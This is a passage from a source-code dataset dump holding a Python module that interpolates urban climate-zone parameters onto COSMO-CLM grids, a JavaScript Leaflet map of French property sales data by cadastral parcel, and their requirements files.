same is done for the emissivity.\n ucp['URB_SALB'] = ucp['URB_SALB_BK'] / psi_bulk\n ucp['URB_TALB'] = ucp['URB_TALB_BK'] / psi_bulk\n ucp['URB_EMIS'] = 1 - ucp['URB_TALB']\n\n ## Also add the thermal admittance\n # ucp['URB_TADM'] = (ucp['URB_HCAP']*ucp['URB_HCON'])**0.5\n\n ## iS SAI weighting requested, according to Eq. 4?\n ## This is done within TERRA_URB, so no need to do for COSMO/CLM input files.\n if saiWeight:\n ucp['URB_HCON'] = ucp['URB_HCON'] * SAI\n ucp['URB_HCAP'] = ucp['URB_HCAP'] * SAI\n # ucp['URB_TADM'] = ucp['URB_TADM'] * SAI\n\n return ucp\n\n\n## Helper function to do the interpolation\ndef cosmo_interpolator(xLcz, yLcz, dataLcz, xClm, yClm, interpMethod='linear',\n aggregation=True, aggregationScale = 2):\n\n \"\"\"\n AUTHOR: Matthias Demuzere (matthias.demuzere [@] rub.de)\n\n :param xLcz: values of LCZ longitudes\n :param yLcz: values of LCZ latitudes\n :param dataLcz: 2D array of LCZ parameter value\n :param xClm: values of COSMO-CLM longitudes\n :param yClm: values of COSMO-CLM latitudes\n :param interpMethod: \"linear\" (default) or \"nearest\"\n :param aggregation: Boolean to aggregate or not\n :param aggregationScale: scaler integer to do a pre-processing aggregation (default = 2, ~ half size of CLM dimensions)\n\n :return: 2d-array of the lcz paramater on the COSMO-CLM grid / dimensions\n \"\"\"\n\n if aggregation:\n ## First aggregate the LCZ data, to ~ twice the size of the CLM domain (defined by aggregationParam)\n aggNr = np.round(np.max([len(xClm) / len(xLcz), len(yClm) / len(yLcz)]), 3)\n lczVarAgg = scipy.ndimage.zoom(dataLcz, aggNr * aggregationScale, order=1);\n\n ## Get corresponding new LCZ lat and lon values\n latsAgg = np.linspace(yLcz.min(), yLcz.max(), lczVarAgg.shape[0])\n lonsAgg = np.linspace(xLcz.min(), xLcz.max(), lczVarAgg.shape[1])\n\n interp_object = RegularGridInterpolator((latsAgg, lonsAgg), lczVarAgg, method=interpMethod)\n\n else:\n interp_object = RegularGridInterpolator((yLcz, xLcz), dataLcz, method=interpMethod)\n\n return interp_object, aggNr\n\n\n\ndef lcz_to_cosmo(ucpFile, clmFile, lczFile, bandNr, ucpVersion, nrLcz=17,\n interpMethod='linear', aggregation=True, 
aggregationScale=2,\n isaWeight=True, saiWeight=False,\n fileNameExt=''):\n \"\"\"\n Function to introduce LCZ Urban Canopy Parameters into CCLM domain file\n\n AUTHOR: Matthias Demuzere (matthias.demuzere [@] rub.de)\n\n :param ucpFile: full absolute path name to ucp .csv table.\n :param clmFile: full absolute path name to COSMO-CLM domain file\n :param lczFile: full absolute path name to lcz geotiff file.\n :param bandNr: integer, referring to version of LCZ map:\n 0 = lcz, 1 = lczFilter, 2 = lczFilter CGLS mask, 3 = lczFilter GAIA mask\n :param ucpVersion: version of ucp file used: 'high' (Stewart and Oke, 2014) or 'default'\n :param gcFile: full path to file containing Globcover parameters per class\n :param nrLcz: highest value of LCZ class present (default is 17)\n :param interpMethod: 'linear' (default) or 'nearest'\n :param aggregation: Boolean to aggregate or not\n :param aggregationScale: scaler integer to do a pre-processing aggregation (default = 2, ~ half size of CLM dimensions)\n :param isaWeight: Boolean. Weighs parameter according to ISA fraction (default == True)\n :param saiWeight: Weigh parameters according to Surface Area Index (Default = False)\n :param fileNameExt: provide opportunity for additional file name extension (default: '')\n\n :return:\n LAFxxxxxx_lcz.nc file, with\n - additional fields for 'ISA','AHF','BLDH','BLDFR','HW','CVS','ALB'\n - correcting for double counting for Globcover affected fields\n\n References:\n - Stewart, I.D., Oke, T.R., 2012. Local Climate Zones for Urban Temperature Studies.\n Bull. Am. Meteorol. Soc. 93, 1879–1900. https://doi.org/10.1175/BAMS-D-11-00019.1\n - Wouters, H., Demuzere, M., Blahak, U., Fortuniak, K., Maiheu, B., Camps, J.,\n Tielemans, D., van Lipzig, N.P.M., 2016. Efficient urban canopy parametrization\n for atmospheric modelling: description and application with the COSMO-CLM model\n (version 5.0_clm6) for a Belgian Summer. Geosci. Model Dev. 
9, 3027–3054.\n https://doi.org/10.5194/gmd-2016-58\n\n \"\"\"\n\n ## for testing\n #nrLcz = 17; interpMethod = 'linear'; aggregation = True; aggregationScale = 2; isaWeight = True\n\n lookupUCP = prepare_ucp_lookup(ucpFile,saiWeight)\n\n ## Read lcz file, make copy of original domainFile\n lczMap = xr.open_rasterio(lczFile)[bandNr,:,:].astype('int')\n lczMap = lczMap.rename({'x': 'lon', 'y': 'lat'})\n lczMap = lczMap.reindex(lat=lczMap.lat[::-1])\n\n ## Read LCZ map coordinates\n xLcz, yLcz = lczMap.lon.values, lczMap.lat.values\n\n ## Create a new domain file as a copy of the original one\n clmFileNew = clmFile.replace('.nc','_lcz_{}_{}{}.nc'.format(bandNr,ucpVersion,fileNameExt))\n clm = xr.open_dataset(clmFile)\n\n ## Read COSMO-CLM coordinates\n xClm, yClm = clm.lon.values, clm.lat.values\n\n ## Define list of all urban parameters.\n ## Only change FR_PAVED and URBAN after fixing double counting.\n urbParameters = ['ISA',\n 'FR_PAVED',\n 'URB_BLDFR',\n 'URB_BLDH',\n 'URB_H2W',\n 'AHF',\n 'URB_SALB',\n 'URB_TALB',\n 'URB_EMIS',\n 'URB_SALB_FL',\n 'URB_TALB_FL',\n 'URB_EMIS_FL',\n 'URB_SALB_BK',\n 'URB_TALB_BK',\n 'URB_EMIS_BK',\n 'URB_HCON',\n 'URB_HCAP']\n\n ## Create maps of UCPs, store in xarray data object\n for ucp in urbParameters:\n\n ## If variables not present, create variable with dummy values\n ## in dataarray, and overwrite below\n if not ucp in list(clm.variables.keys()):\n clm[ucp] = clm['URBAN'].copy()\n\n keys = np.arange(1, nrLcz+1, 1)\n values = lookupUCP[ucp]\n out = np.empty((max(keys) + 1,), object); out[list(keys)] = values\n dataLcz = np.array(out[lczMap], dtype='float')\n\n ## Set nans to 0, required for interpolation.\n dataLcz[np.isnan(dataLcz)] = 0\n\n ## Store isa separately for weighting\n if ucp == 'ISA':\n dataISA = dataLcz\n\n ## Weigh values according to ISA - Step 1\n if isaWeight == True and not ucp in ['ISA','AHF','FR_PAVED']:\n print(\"isaWeight on: ucp's are being weighed by ISA fraction\")\n dataLcz = dataLcz * dataISA\n\n ## Get interpolation object\n interp_object, aggNr = cosmo_interpolator(xLcz, yLcz, dataLcz, xClm, yClm,\n interpMethod, aggregation, aggregationScale)\n\n ## Apply to get resampled data\n clmPoints = yClm, xClm\n dataLczResampled = interp_object(clmPoints)\n\n ## Store isa lczClm separately for weighting\n if ucp == 'ISA':\n dataISAres = dataLczResampled\n\n ## re-Weigh values according to ISA - Step 2\n if isaWeight == True and not ucp in ['ISA','AHF','FR_PAVED']:\n dataLczResampled = dataLczResampled / dataISAres\n\n ## Set all nans to zero, otherwise issues with COSMO.\n dataLczResampled[np.isnan(dataLczResampled)] = 0\n\n ## Add values to file.\n clm[ucp].values = dataLczResampled\n\n print('{} field has been updated'.format(ucp))\n\n ## Change variable attributes\n clm[ucp].attrs['data_set'] = 'Values derived from Local Climate Zone properties'\n\n ## Set FR_PAVED equal to ISA.\n clm['FR_PAVED'].values = clm['ISA'].values\n\n ## Add global attribute\n clm.attrs['note2'] = 'LCZ Urban canopy look up data retrieved from Stewart and Oke (2012) \\n' \\\n ' and Stewart et al. (2014). Conversion to bulk properties done via SURY \\n' \\\n 'from Wouters et al. 
(2016): https://github.com/hendrikwout/sury/blob/master/sury.py.'\n\n ## Write to file\n print(\"Writing COSMO-CLM domain with LCZ values to {}\".format(clmFileNew))\n clm.to_netcdf('{}'.format(clmFileNew))\n\n return '{}'.format(clmFileNew)\n\n\ndef remove_double_counting(clmFile,gcFile,removeUrban=True,qLow=0.25,qHigh=0.75,fileNameExt=''):\n\n \"\"\"\n Function to remove the double counting of URBAN-BASED parameter values\n\n AUTHOR: Matthias Demuzere (matthias.demuzere [@] rub.de)\n\n :param clmFile: full absolute path name to COSMO-CLM domain file\n :param gcFile: full absolute path name to globcover look-up table\n :param removeUrban: Boolean to indicate if URBAN effect from GlobCover needs to be removed (default=True)\n If False, the procedure from EXTPAR is reconstructed, values should =~ input file.\n :param qLow, qHigh: Low and high quantile.\n Where URBAN == 1, values are random sampled between qLow qnd qHigh (from URBAN == 0 pixels)\n :param fileNameExt: provide opportunity for additional file name extension (default: '')\n\n :return:\n Adjusted COSMO/CLM domain file, with:\n * fixes for (if enabeld): 'Z0', 'PLCOV_MN', 'PLCOV_MX', 'LAI_MN', 'LAI_MX', 'ROOTDP',\n 'EMIS_RAD', 'SKC', 'RSMIN', 'FOR_D', 'FOR_E'\n * URBAN and FR_PAVED set to ISA.\n \"\"\"\n\n ## Constants\n hp = 30 # height of Prandtl-layer, taken from EXTPAR's mo_agg_globcover.f90\n\n ## Read original file, adjusted for LCZs\n clm = xr.open_dataset('{}'.format(clmFile)) #, decode_coords=False)\n\n ## Make string for output file, allow for file name extensions\n clm_oFile = clmFile.replace('.nc', '_fixDC_{}{}.nc'.format(removeUrban,fileNameExt))\n\n ## Read relevant fields for double counting\n lu = clm.LU_CLASS_FRACTION.values\n urb = clm.URBAN.values\n frl = clm.FR_LAND.values\n\n ## Read parameterfile\n gc_lookup = pd.read_csv(gcFile, sep=';').iloc[:,2:]\n gc_vars = gc_lookup.columns.to_list()\n\n ## Whether or not to fix the double counting\n if removeUrban:\n print('Double counting will be removed from the urban pixels')\n nonUrban = [x for x in range(23) if x != 18]\n else:\n print('Double counting not addressed: reconstruction of original domain file values.')\n nonUrban = list(range(23))\n\n ## Define the pixels that need to be altered\n touchPix = np.asarray(np.logical_and(np.logical_and(urb > 0, urb != 1), frl > 0.5))\n print('{} pixels identified with 0 < urb < 1, frl > 0.5'.format(np.sum(touchPix)))\n\n ## Start replacing the values, use array broadcasting for efficiency\n for gc_var in gc_vars:\n if gc_var in list(clm.var()):\n print('Fixing double counting for {}: {}'.format(gc_var, removeUrban))\n\n ## Initialize array to store new values in.\n clmValue = clm[gc_var].values\n tmp = clmValue.copy()\n\n #tmp[np.isnan(clmValue)] = np.nan\n\n ## Stretch land use to unity if urban fractions are removed.\n luStretched = lu[nonUrban, :, :] * (1 / np.sum(lu[nonUrban, :, :], axis=0))\n\n if gc_var in ['PLCOV_MX', 'PLCOV_MN', 'EMIS_RAD', 'SKC']:\n tmp_v = np.sum(luStretched * np.expand_dims(gc_lookup[gc_var][nonUrban], axis=[1, 2]), axis=0)\n tmp[touchPix] = tmp_v[touchPix]\n\n elif gc_var in ['Z0']:\n tmp_v = np.sum(\n luStretched / np.expand_dims(np.log(hp) - np.log(gc_lookup[gc_var][nonUrban]), axis=[1, 2]),\n axis=0)\n tmp[touchPix] = hp * np.exp(-1 / tmp_v[touchPix])\n\n elif gc_var in ['ROOTDP', 'LAI_MN', 'LAI_MX', 'FOR_D', 'FOR_E']:\n luStretched = lu[nonUrban, :, :] * (1 / np.sum(lu[nonUrban, :, :]))\n tmp_n = np.sum(\n luStretched * np.expand_dims(gc_lookup['PLCOV_MX'][nonUrban] * 
gc_lookup[gc_var][nonUrban], axis=[1, 2]),\n axis=0)\n tmp_d = np.sum(luStretched * np.expand_dims(gc_lookup['PLCOV_MX'][nonUrban], axis=[1, 2]), axis=0)\n tmp[touchPix] = tmp_n[touchPix] / tmp_d[touchPix]\n\n ## Fix the pixels with URB == 1, replace random values between Q1 and Q2 over domain (non-urban)\n if removeUrban:\n replacePixels = np.logical_and(urb == 0, lu[-1, :, :] == 0)\n #tmp[urb == 1] = np.nanmedian(tmp[replacePixels])\n tmp_q = np.quantile(tmp[replacePixels], [qLow,qHigh])\n tmp[urb == 1] = np.random.uniform(tmp_q[0],tmp_q[1],size=tmp.shape)[urb == 1]\n\n ## Set values in clm file\n clm[gc_var].values = tmp\n print('Done for {}'.format(gc_var))\n\n ## Set URBAN and FR_PAVED to ISA, for consistency\n clm['URBAN'].values = clm['ISA'].values\n clm['FR_PAVED'] = clm['ISA'].copy()\n\n ## Write to file\n print(\"Writing COSMO-CLM domain with double counting fixed: {}\".format(clm_oFile))\n clm.to_netcdf('{}'.format(clm_oFile))\n"
},
{
"alpha_fraction": 0.4166666567325592,
"alphanum_fraction": 0.6527777910232544,
"avg_line_length": 13.399999618530273,
"blob_id": "aea0757e43e8bc4238be5e7e9317e472906bca73",
"content_id": "92496d8a923b898c3edaaf49fa14d9874bcb286c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "shepherdmeng/WUDAPT-to-COSMO",
"src_encoding": "UTF-8",
"text": "rasterio==1.1.4\nscipy==1.4.1\nnumpy==1.19.4\nxarray==0.15.1\npandas==1.0.5\n"
}
] | 4 |
ghyster/dvf | https://github.com/ghyster/dvf | 38169e2f3b7b8a1701440f1b660ee86360fbcd7b | 54f88117e3b033a3f4d189cb18340d773b979a87 | 0ca51063560ccb02596b5f02eba9299376252bbd | refs/heads/main | 2023-08-11T05:08:35.025645 | 2021-10-12T08:44:44 | 2021-10-12T08:44:44 | 416,249,362 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5314062833786011,
"alphanum_fraction": 0.5426084995269775,
"avg_line_length": 38.28094482421875,
"blob_id": "5fc45490f70afc5e87bb5466714d996874b28e5b",
"content_id": "6be9342a10dd29ec1f5644fc4ca20e5e5d7510b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 20008,
"license_type": "no_license",
"max_line_length": 238,
"num_lines": 509,
"path": "/static/js/dvf.js",
"repo_name": "ghyster/dvf",
"src_encoding": "UTF-8",
"text": "var iMap = (function() {\n\n var MIN_DATE = '2014-01-01'\n var MAX_DATE = '2020-12-31'\n var adresseAPI = 'https://api-adresse.data.gouv.fr/search/?q=';\n var layer = L.tileLayer('https://cartodb-basemaps-{s}.global.ssl.fastly.net/light_all/{z}/{x}/{y}.png',{\n\t\t\t attribution: '© <a href=\"http://www.openstreetmap.org/copyright\">OpenStreetMap</a> contributors, © <a href=\"http://cartodb.com/attributions\">CartoDB</a>'\n\t\t\t});\n\n var map;\n var features;\n var layers; \n var departements; \n var departementLayer; \n var communes;\n var communeLayer;\n var communesMappingPromise;\n var currentcommune;\n var sections;\n var sectionLayer;\n var parcelleLayer; \n var hiddenCommunes=[];\n var hiddenSections=[];\n var hiddenDepartements=[];\n\n var startDate = MIN_DATE\n var endDate = MAX_DATE\n\n var data_section;\n var data_mutation=[];\n var prix_m=[];\n var alllayers=[];\n\n var myStyle = { fillOpacity: 0, color: \"#000000\", weight: 2, opacity: 0.65 };\n var overStyle = { color: \"#000000\", fillColor: \"#92B4F4\", fillOpacity: 0.35, weight: 4, opacity: 0.65 };\n var mutationStyle = { fillOpacity: 0.50, weight: 2, color: \"#000000\", fillColor: \"#885053\" };\n \n function highlightDepartement(e) {\n var layer = e.target;\n overStyle.fillColor=\"#92B4F4\";\n layer.setStyle(overStyle);\n\n if (!L.Browser.ie && !L.Browser.opera && !L.Browser.edge) {\n layer.bringToFront();\n }\n }\n\n function resetDepartement(e) {\n departementLayer.resetStyle(e.target);\n }\n\n function entrerDansDepartement(sonCode) {\n /*if (hiddenDepartements.length>0) {\n resetDepartement(hiddenDepartements[0].pop());\n }\n \n // Vide l'interface\n codeDepartement = sonCode;\n console.log('Nous entrons dans le département ' + codeDepartement);*/\n // Charge les communes\n return getCommunes(sonCode).then(afficherCommunesDepartement);\n }\n\n function entrerDansCommune(comCode) {\n return getSections(comCode).then(afficherSections);\n }\n\n function getCommunes(codeDepartement) {\n hiddenDepartements.push(alllayers[codeDepartement]);\n departementLayer.removeLayer(alllayers[codeDepartement]);\n return $.getJSON(`https://geo.api.gouv.fr/departements/${codeDepartement}/communes?geometry=contour&format=geojson&type=commune-actuelle`).then(function (communes) {\n \n // Pour Paris, Lyon, Marseille, il faut compléter avec les arrondissements\n if (['75', '69', '13'].includes(codeDepartement)) {\n return $.getJSON('/donneesgeo/arrondissements_municipaux-20180711.json').then(function (arrondissements) {\n var features = communes.features.filter(function (e) {\n return !(['13055', '69123', '75056'].includes(e.properties.code))\n })\n arrondissements.features.forEach(function (arrondissement) {\n if (arrondissement.properties.code.startsWith(codeDepartement)) {\n features.push(arrondissement)\n }\n })\n return {type: 'FeatureCollection', features: features}\n })\n }\n \n return {type: 'FeatureCollection', features: communes.features}\n })\n }\n\n function getCadastreLayer(layerName, codeCommune) {\n return communesMappingPromise.then(function (communesMapping) {\n var communesToGet = codeCommune in communesMapping ? 
communesMapping[codeCommune] : [codeCommune]\n return Promise.all(communesToGet.map(function (communeToGet) {\n return getRemoteJSON(`https://cadastre.data.gouv.fr/bundler/cadastre-etalab/communes/${communeToGet}/geojson/${layerName}`)\n })).then(function (featureCollections) {\n return {\n type: 'FeatureCollection',\n features: featureCollections.reduce(function (acc, featureCollection) {\n if (featureCollection && featureCollection.features) {\n return acc.concat(featureCollection.features)\n }\n \n return acc\n }, [])\n }\n })\n })\n }\n\n function getParcelles(codeCommune, idSection) {\n //console.log(idSection);\n return getCadastreLayer('parcelles', codeCommune).then(function (featureCollection) {\n return {\n type: 'FeatureCollection',\n features: _.chain(featureCollection.features)\n .filter(function (f) {\n return f.id.startsWith(idSection)\n })\n .sortBy('id')\n .value()\n }\n })\n }\n\n function getMutations(codeCommune, idSection, startDate, endDate) {\n //console.log(section);\n return getRemoteJSON(`/api/mutations3/${codeCommune}/${idSectionToCode(idSection)}`)\n .then(function (data) {\n return data.mutations.filter(function (m) {\n return m.date_mutation >= startDate && m.date_mutation <= endDate && m.id_parcelle.startsWith(idSection)\n })\n })\n }\n\n function getSections(codeCommune) {\n hiddenCommunes.push(alllayers[codeCommune]);\n communeLayer.removeLayer(alllayers[codeCommune]);\n return getCadastreLayer('sections', codeCommune).then(function (featureCollection) {\n var features = featureCollection.features\n var hasMultiplePrefixes = features.some(function (f) {\n return f.properties.commune !== codeCommune || f.properties.prefixe !== '000'\n })\n features.forEach(function (f) {\n if (!hasMultiplePrefixes) {\n f.properties.label = f.properties.code\n return\n }\n \n var labelPrefix = f.properties.commune === codeCommune ? 
f.properties.prefixe : f.properties.commune.substr(2)\n f.properties.label = `${labelPrefix} ${f.properties.code}`\n })\n return {type: 'FeatureCollection', features: features}\n })\n }\n\n function afficherCommunesDepartement(data){\n communes=data;\n if(communeLayer) map.removeLayer( communeLayer );\n if(sectionLayer) map.removeLayer( sectionLayer );\n if(parcelleLayer) map.removeLayer( parcelleLayer );\n communeLayer = L.geoJSON([],{\n style: myStyle,\n onEachFeature: function(feature, layer){\n feature.id=feature.properties.code;\n alllayers[feature.id]=layer;\n layer.on({\n mouseover: highlightCommune,\n mouseout: resetCommune,\n click: enterCommune\n });\n }\n }).addTo(map);\n communeLayer.addData(communes);\n \n map.fitBounds(communeLayer.getBounds());\n /*hiddenDepartements.push(e.target.feature);\n map.removeLayer(e.target);*/\n }\n\n function enterDepartement(e) {\n //console.log(e.target.feature);\n \n var codedept=e.target.feature.properties.code;\n while (current = hiddenDepartements.pop()){ departementLayer.addData(current); }\n hiddenCommunes=[];hiddenSections=[];\n getCommunes(codedept).then(afficherCommunesDepartement);\n \n } \n \n function highlightCommune(e) {\n var layer = e.target;\n overStyle.fillColor=\"#BDCFB5\";\n layer.setStyle(overStyle);\n\n if (!L.Browser.ie && !L.Browser.opera && !L.Browser.edge) {\n layer.bringToFront();\n }\n }\n\n function resetCommune(e) {\n communeLayer.resetStyle(e.target);\n }\n\n function afficherSections(data){\n sections=data;\n if(sectionLayer) map.removeLayer( sectionLayer );\n if(parcelleLayer) map.removeLayer( parcelleLayer );\n sectionLayer = L.geoJSON([],{\n style: myStyle,\n onEachFeature: function(feature, layer){\n alllayers[feature.id]=layer;\n layer.on({\n mouseover: highlightSection,\n mouseout: resetSection,\n click: enterSection\n });\n }\n }).addTo(map);\n sectionLayer.addData(sections);\n \n map.fitBounds(sectionLayer.getBounds());\n /*hiddenCommunes.push(e.target.feature);\n map.removeLayer(e.target);*/\n }\n\n function enterCommune(e) {\n //console.log(e.target.feature);\n currentcommune=e.target;\n //while (current = hiddenCommunes.pop()){ communeLayer.addData(current); }\n //hiddenSections=[];\n getSections(e.target.feature.properties.code).then(afficherSections);\n } \n\n function highlightSection(e) {\n var layer = e.target;\n overStyle.fillColor=\"#70B77E\";\n layer.setStyle(overStyle);\n\n if (!L.Browser.ie && !L.Browser.opera && !L.Browser.edge) {\n layer.bringToFront();\n }\n }\n\n function resetSection(e) {\n sectionLayer.resetStyle(e.target);\n }\n\n function highlightMutation(e) {\n //console.log(e.target.options);\n var layer = e.target;\n overStyle.fillColor=e.target.options.fillColor;\n layer.setStyle(overStyle);\n\n if (!L.Browser.ie && !L.Browser.opera && !L.Browser.edge) {\n layer.bringToFront();\n }\n }\n\n function resetMutation(e) {\n mutationStyle.fillColor=e.target.options.fillColor;\n e.target.setStyle(mutationStyle);\n }\n\n function enterMutation(e){\n \n //console.log(_.meanBy(prix_m[e.target.feature.id], (m) => m.prixm),data_mutation[e.target.feature.id]);\n prixm2=_(prix_m[e.target.feature.id])\n .groupBy('mutation_id')\n .map((prixm) => ({ valeur: _.meanBy(prixm,function(o) { return Number(o.prixm); }) }))\n .value();\n console.log(prixm2[0].valeur,prix_m[e.target.feature.id]);\n\n }\n\n function getColor(d) {\n return !isFinite(d) ? '#9332a8' :\n d > 5000 ? '#dd776e' :\n d > 4500 ? '#e2886c' :\n d > 4000 ? '#e79a69' :\n d > 3500 ? '#ecac67' :\n d > 3000 ? '#e9b861' :\n d > 2500 ? 
'#f5ce62' :\n d > 2000 ? '#d4c86a' :\n d > 1500 ? '#b0be6e' :\n d > 1000 ? '#94bd77' :\n d > 500 ? '#73b87e' :\n '#57bb8a';\n }\n\n function entrerDansSection(){\n // Une fois qu'on a la géographie et les mutations, on fait tout l'affichage\n \n var parcellesId = data_section.map(function (parcelle) {\n return parcelle.id_parcelle\n });\n parcellesId.unshift('id');\n parcellesId=_.uniq(parcellesId);\n _.forEach(parcellesId, function(value) {prix_m[value]=[];}); \n _.forEach(data_section, function(value,key) {data_mutation[value.id_mutation]=[];});\n _.forEach(data_section, function(value,key) {\n data_mutation[value.id_mutation].push(value);\n });\n \n _.forEach(data_section, function(value,key) {\n /*test=_(data_mutation[value.id_mutation]).map((prixm,cle) => ({ valeur: _.meanBy(prixm,function(o) { return Number(o.valeur_fonciere); }),surface: _.sumBy(prixm, function(o) { return Number(o.surface_reelle_bati); }), }))\n .value();\n */\n //console.log(_.meanBy(data_mutation[value.id_mutation],function(o) { return Number(o.valeur_fonciere); }),_.sumBy(data_mutation[value.id_mutation],function(o) { return Number(o.surface_reelle_bati); }));\n vf=_.meanBy(data_mutation[value.id_mutation],function(o) { return Number(o.valeur_fonciere); });\n su=_.sumBy(data_mutation[value.id_mutation],function(o) { return Number(o.surface_reelle_bati); });\n if(su==0){\n su=_.sumBy(data_mutation[value.id_mutation],function(o) { return Number(o.surface_terrain); });\n }\n if(isFinite(vf/su)){\n value.prixm=vf/su;\n prix_m[value.id_parcelle].push(value);\n }\n \n }); \n //console.log(data_mutation);\n parcelleLayer = L.geoJSON([],{\n style: myStyle,\n onEachFeature: function(feature, layer){\n //console.log(feature);\n if(_.includes(parcellesId, feature.id)){\n //calcul de la moyenne par rapport au prixm² groupé par mutation\n prixm2=_(prix_m[feature.id])\n .groupBy('mutation_id')\n .map((prixm) => ({ valeur: _.meanBy(prixm,function(o) { return Number(o.prixm); }) }))\n .value();\n //console.log(prixm2,);\n if(prixm2.length==0){\n color='#9332a8';\n }else{\n color=getColor(prixm2[0].valeur);\n }\n mutationStyle.fillColor=color;\n layer.setStyle(mutationStyle);\n layer.on({\n mouseover: highlightMutation,\n mouseout: resetMutation,\n click: enterMutation\n });\n }\n } \n }).addTo(map);\n parcelleLayer.addData(parcelles);\n map.fitBounds(parcelleLayer.getBounds());\n parcelleLayer.bringToFront();\n \n //hiddenSections.push(e.target.feature);\n //map.removeLayer(e.target);\n \n }\n\n function enterSection(e) {\n //console.log(e.target.feature.properties);\n //e.target.setStyle({ fill: false });\n hiddenSections.push(alllayers[e.target.feature.id]);\n sectionLayer.removeLayer(alllayers[e.target.feature.id]);\n return Promise.all([\n // Charge la couche géographique\n getParcelles(currentcommune.feature.properties.code, e.target.feature.properties.id).then(function (data) {\n parcelles = data;\n }),\n // Charge les mutations\n getMutations(currentcommune.feature.properties.code, e.target.feature.properties.id, startDate, endDate).then(function (data) {\n data_section = data\n })\n ]).then(entrerDansSection);\n } \n \n function getRemoteJSON(url, throwIfNotFound) {\n return fetch(url).then(function (response) {\n if (response.ok) { return response.json()} \n if (response.status === 404 && !throwIfNotFound) { return } \n throw new Error('Impossible de récupérer les données demandées : ' + response.status)\n })\n }\n\n function idSectionToCode(idSection) {\n return idSection.substr(5, 5)\n }\n\n function 
autocompleteAdresse(){\n var inputValue = document.getElementById(\"rechercheadresse\").value;\n if (inputValue) {\n fetch(adresseAPI+inputValue)\n .then(function (response) {\n response.json().then(function (data) {\n responseAdresse(data);\n });\n });\n } else {\n document.getElementById(\"selectionadresse\").style.display = \"none\";\n }\n }\n\n function responseAdresse(response) {\n select = document.getElementById(\"selectionadresse\");\n if (Object.keys(response.features).length > 0) {\n \n select.style.display = \"block\";\n select.innerHTML=\"\";\n var ul = document.createElement('ul');\n select.appendChild(ul);\n response.features.forEach(function (element) {\n var li = document.createElement('li');\n var ligneAdresse = document.createElement('span');\n var infosAdresse = document.createTextNode(element.properties.postcode + ' ' + element.properties.city);\n ligneAdresse.innerHTML = element.properties.name;\n li.onclick = function () { /*selectAdresse(element);*/getSectionFromAdresse(element) };\n li.appendChild(ligneAdresse);\n li.appendChild(infosAdresse);\n ul.appendChild(li);\n });\n } else {\n select.style.display = \"none\";\n }\n }\n\n function getSectionFromAdresse(element){\n query = encodeURIComponent(JSON.stringify(element.geometry));\n return getRemoteJSON(`https://apicarto.ign.fr/api/cadastre/division?geom=${query}`)\n .then(function (data) {\n //console.log(data.features[0].properties);\n document.getElementById(\"selectionadresse\").style.display='none';\n var props=data.features[0].properties;\n var section = props.section.padStart(5, '0');\n\t\t\tvar code_dep = props.code_dep;\n\t\t\tvar code_com = props.code_com;\n entrerDansDepartement(code_dep).then(function(){\n\t\t\t\tentrerDansCommune(code_dep+code_com).then(function(){\n currentcommune=alllayers[code_dep+code_com];\n hiddenSections.push(alllayers[code_dep+code_com+section]);\n sectionLayer.removeLayer(alllayers[code_dep+code_com+section]);\n\t\t\t\t\treturn Promise.all([\n // Charge la couche géographique\n getParcelles(code_dep+code_com, code_dep+code_com+section).then(function (data) {\n parcelles = data;\n }),\n // Charge les mutations\n getMutations(code_dep+code_com, code_dep+code_com+section, startDate, endDate).then(function (data) {\n data_section = data\n })\n ]).then(entrerDansSection);\n \n });\n });\n });\n }\n // Public API\n return {\n map: map,\n features: features,\n layers: layers,\n getMap: function(){\n return map;\n },\n init: function(){\n \n map = L.map('map', {\n /*crs: crs,*/\n attributionControl: false,\n minZoom: 6,//minZoom: 10\n messagebox: false\n });\n\n layer.addTo(map);\n \n map.setView(L.latLng(47, 3),5);\n\n // Chargement des contours des départements\n $.getJSON(\"/donneesgeo/departements-100m.geojson\",\n function (data) {\n departements = data\n }\n ).then(function() {\n \n departementLayer = L.geoJSON([],{\n style: myStyle,\n onEachFeature: function(feature, layer){\n feature.id=feature.properties.code;\n alllayers[feature.id]=layer;\n layer.on({\n mouseover: highlightDepartement,\n mouseout: resetDepartement,\n click: enterDepartement\n });\n }\n }).addTo(map);\n departementLayer.addData(departements);\n });\n communesMappingPromise = getRemoteJSON('/donneesgeo/communes-mapping.json', true); \n //map.on('overlayadd', loadLayer);\n \n document.getElementById('rechercheadresse').addEventListener(\"input\", _.debounce(autocompleteAdresse,500), false); \n }\n};\n\n})();\n\n$(document).ready(function() {\n//$.cookie.json = true;\niMap.init();\n\n}); "
},
{
"alpha_fraction": 0.4636363685131073,
"alphanum_fraction": 0.6818181872367859,
"avg_line_length": 14.714285850524902,
"blob_id": "97b02538ba9d9b1f1b9bd508e61304a712949ddd",
"content_id": "89820838588554f1fb05303076a9351c83c09fca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 14,
"path": "/requirements.txt",
"repo_name": "ghyster/dvf",
"src_encoding": "UTF-8",
"text": "click==8.0.1\nFlask==2.0.1\ngreenlet==1.1.1\nitsdangerous==2.0.1\nJinja2==3.0.1\nMarkupSafe==2.0.1\nnumpy==1.21.2\npandas==1.3.3\nPyMySQL==1.0.2\npython-dateutil==2.8.2\npytz==2021.1\nsix==1.16.0\nSQLAlchemy==1.4.25\nWerkzeug==2.0.1\n"
},
{
"alpha_fraction": 0.6754098534584045,
"alphanum_fraction": 0.6901639103889465,
"avg_line_length": 36.367347717285156,
"blob_id": "96d405842222102777f03c19ac969a553a87f991",
"content_id": "379dea9fd5c85c81bb8b5ada290b435b5da6fffb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1831,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 49,
"path": "/app.py",
"repo_name": "ghyster/dvf",
"src_encoding": "UTF-8",
